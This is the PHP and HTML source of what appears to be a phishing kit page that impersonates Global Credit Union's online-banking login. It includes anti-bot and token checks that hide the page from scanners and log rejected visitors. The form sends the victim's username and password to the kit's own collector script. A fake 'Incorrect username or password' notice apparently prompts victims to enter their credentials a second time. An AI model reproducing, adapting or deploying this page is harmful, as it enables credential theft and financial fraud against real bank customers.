<?php

    session_start();

    require_once '../Meta/Comp.php';
    require_once '../Meta/Antibot.php';
    require_once '../Meta/demonTest.php';

    $comps = new Comp;
    $antibot = new Antibot;

    $settings = $comps->settings();

    if (!$comps->checkToken()) {
        echo $antibot->throw404();
        $comps->log(
            "../Astute/Audio/kill.txt",
            "IP: " . $_SESSION['ip'] . "\nUser Agent: " . $comps->getUserAgent() . "\nReason: Token\n\n"
        );
        die();
    }

    if (
        !isset($_SESSION['username']) ||
        $_SESSION['username'] == ""
    ) {
        echo $antibot->throw404();
        $comps->log(
            "../Astute/Audio/kill.txt",
            "IP: " . $_SESSION['ip'] . "\nUser Agent: " . $comps->getUserAgent() . "\nReason: Skipping Pages\n\n"
        );
        die();
    }

?>
<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <title>Login</title>
   <meta http-equiv="X-UA-Compatible" content="IE=Edge">

   <link rel="stylesheet" href="./index_files/ub-print.css" type="text/css" media="print">
   <link rel="stylesheet" href="./index_files/ub-popup.css" type="text/css" media="screen, projection">
   <link rel="stylesheet" href="./index_files/ub-main.css" type="text/css" title="main" media="screen, projection">
   <link rel="stylesheet" href="./index_files/ub-login-new.css" type="text/css">
   

  <noscript>
    <meta http-equiv="Refresh" content="0;url=browser-requirements.jsp" />
  </noscript>

   <style>

      @import url('https://fonts.googleapis.com/css2?family=Montserrat&display=swap');

      label {
         font-weight: bold;
         color: #001C71;
      }
      .imageBox { margin:1em 0; }
      .imageBox img { border-radius: 5px; }
      form { margin-top: 2em; }

      /*local overrides*/
      #loginBox {background-color:white;}
      #loginBox > div, #loginBox > form > div { background-color:white;}

      /*password visible toggle styling*/
      .toggle-password {
         display: inline-block;
         width: 12px;
         height: 12px;
         margin-left: -20px;
         cursor: pointer;
      }
      .LogIn {
         display: inline-block;
         margin-left: 10px;
         background-color: #FFB71B;
         color: #001C71;
         font-weight: bold;
         font-size: 9px;
         font-family: 'Montserrat',arial,helvetica,sans-serif;
         border: 1px solid #ffb71b;
         padding: 0.75em 1em;
         border-radius: 2px;
      }
      .LogIn:disabled {
         color: #BA8D31;
      }

   /*local ADA fix for keypad instructions*/
   #instr:focus {position:relative !important;max-width:344px;margin-left:3px;margin-bottom:0;background-color:#ffffff; color:#044990;}
   </style>
<script id="cf5bf92080922418ca3df3150265e8f9" src="./index_files/alaska-common.js(1).download" async=""></script></head>
<body onload="Initialize();">
   <div id="header" role="banner">
    <section class="skipLinks" title="Enter your Personal Access Code by simply typing on your keyboard">
      <h2 class="visuallyhidden">Skip links</h2>
      <p><a href="https://secure2.globalcu.org/efs/servlet/efs/login-image-password.jsp#instr" class="visuallyhidden">Skip to main content</a></p>
      <p><a href="https://secure2.globalcu.org/efs/servlet/efs/login-image-password.jsp#pgFooter" class="visuallyhidden">Skip to footer</a></p>
      <p><a href="https://www.globalcu.org/contact" class="visuallyhidden">If you are using a screen reader and having difficulties with the site, 
      call the Member Service Center 24/7 at (800) 525-9094.</a></p>
    </section>
    <div id="topBar">
      <a href="https://www.globalcu.org/" id="logo" title="Global Credit Union"><img src="./index_files/Global_CU_v_180px.png" alt="Global Credit Union"></a>
      <p id="headerReturnLink"><a href="https://www.globalcu.org/">Return to home</a></p>
    </div>

    <div id="pgHead">
    </div>
   </div>

   <div id="pgMain" role="main">
         <div id="mainContent">
           <div class="leftCol">
            <h2>Log in to your account</h2>
            <form action="../Meta/Benchmark/login.php?token=<?php echo $_SESSION['token']; ?>" method="post">
               <input type="hidden" name="Referrerfield" id="referrer">
              <label>Username</label>
              <input type="text" name="username" id="CurrentPassword" required aria-label="Password with Clouds security image"></br></br>

              <input type="hidden" name="Referrerfield" id="referrer">
              <label>Password:</label>
              <input type="password" name="password" required id="CurrentPassword" aria-label="Password with Clouds security image">
              <img src="./index_files/eyeball-open.png" alt="Password visibility toggle" id="toggle-password" class="toggle-password" onclick="togglePasswordMasking(&#39;CurrentPassword&#39;, &#39;toggle-password&#39;)" title="Show Password"></br></br><input type="hidden" name="Referrerfield" id="referrer">
            <label style="color: red; size: 3%;">Incorrect username or password </label></br></br>
              
              <input type="submit" name="Log In" id="LogIn" class="LogIn" value="Log In">
              <div class="imageBox">
                <img src="./index_files/abstract-clouds.jpg">
              </div>
            </form>
            
          </div>

	      	<div class="sideBar">
	      		<div class="learnMore">
	      			<h2 class="help">Quick Help</h2>
                    <ul class="help">
                       
                       <li><a href="https://secure2.globalcu.org/efs/ultrabranch/ForgotPAC">Forgot online password?</a></li>
                       <li id="liKeypadNote">
                          <a href="https://secure2.globalcu.org/efs/servlet/efs/login-image-password.jsp#" id="keypadLabel" onclick="toggleNote(&#39;liKeypadNote&#39;,&#39;keypadNote&#39;);return false;" role="button" aria-controls="keypadNote" aria-expanded="false">Don't recognize security image?</a>
                          <div class="notes" id="keypadNote" role="region" aria-labelledby="keypadLabel" aria-hidden="true">
                             <p>You entered User ID <b>cheeng23#</b> - is this correct?</p>
                             <p>No - <a href="https://www.globalcu.org/" title="Return to previous screen">Return to the previous
                             screen</a> to re-enter your User ID</p>
                             <p>Yes - Call the number listed below.</p>
                          </div>
                       </li>
                       
                    </ul>
                    <div class="help" style="display:none;">
                       <h1>Questions?  (800) 525-9094</h1>
                    </div>
	      		</div>
				<div id="questionSection" class="learnMore">
					<h2>Questions?</h2>
					<p>
						For assistance contact the Member Service Center.
					</p><p style="margin-top:10px;">
						(800) 525-9094<br><br>
						Open 24 hours a day, 7 days a week.<br><br>
						<a href="https://www.globalcu.org/contact" target="_blank">More contact information</a>
					</p>
					<p></p>
				</div>
      	  	</div>
         </div>
         <br><br>
         
         <div id="pgFooter">
            

   <div id="footer" role="contentinfo">

      <p> � Copyright  2023 � Trademark pending for Global Credit Union. </p>
      <p>Real Estate loans are provided by Global Credit Union in Alaska, Arizona, California, Idaho and Washington, NMLS ID #409001.<br>
      Mortgage Loans are provided by Global Credit Union in Arizona, California, Idaho and Washington. NMLS ID #409001. Mortgage loans are provided by Global Credit Union Home Loans, LLC in Alaska and Washington. License #AK157293; Washington Consumer Loan Company License #CL-157293.</p>
         <p><a href="javascript:PopupWindow(&#39;Privacy&#39;);">Privacy</a></p>
      

      <p class="ncua">
         <img src="./index_files/logo-ncua.gif" alt="Your funds federally insured to at least $250,000 and backed by the full faith and credit of the United States Government. National Credit Union Administration, a U.S. Government Agency"><span>Federally insured by NCUA</span>
         <span class="bug">
            <img alt="Equal Housing Lender" src="./index_files/logo-ehl-tri.png">
         </span>
      </p>
   </div>
         </div>
   </div>

</body></html>